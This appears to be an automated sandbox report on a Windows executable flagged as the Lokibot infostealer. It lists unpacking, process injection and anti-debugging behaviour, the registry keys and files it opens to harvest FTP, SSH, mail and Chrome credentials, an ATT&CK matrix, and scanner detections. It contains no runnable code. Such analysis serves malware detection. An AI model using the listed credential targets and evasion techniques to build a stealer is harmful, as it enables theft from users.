                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: Binary string: wntdll.pdbUGP source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp

                Data Obfuscation:

                barindex
                Detected unpacking (overwrites its own PE header)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeUnpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack
                Detected unpacking (changes PE section rights)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeUnpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000A505 push ecx; ret
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dllJump to dropped file
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exe TID: 776Thread sleep time: -540000s >= -30000s
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00402671 FindFirstFileA,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeThread delayed: delay time: 60000
                Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000CDB2 IsDebuggerPresent,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100098C2 GetProcessHeap,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeMemory written: C:\Users\user\Desktop\aZOmps0Ug8.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progman
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                Source: aZOmps0Ug8.exe, 00000001.00000002.612184165.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100098DF cpuid
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00406069 GetUserNameW,

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: PopPassword
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: SmtpPassword
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationApplication Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Obfuscated Files or Information2Credentials in Registry2Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Software Packing2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery16Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsSecurity Software Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncVirtualization/Sandbox Evasion11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                aZOmps0Ug8.exe43%VirustotalBrowse
                aZOmps0Ug8.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.0.aZOmps0Ug8.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                1.2.aZOmps0Ug8.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.1.aZOmps0Ug8.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.aZOmps0Ug8.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
                0.2.aZOmps0Ug8.exe.f030000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.aZOmps0Ug8.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

                Domains

                SourceDetectionScannerLabelLink
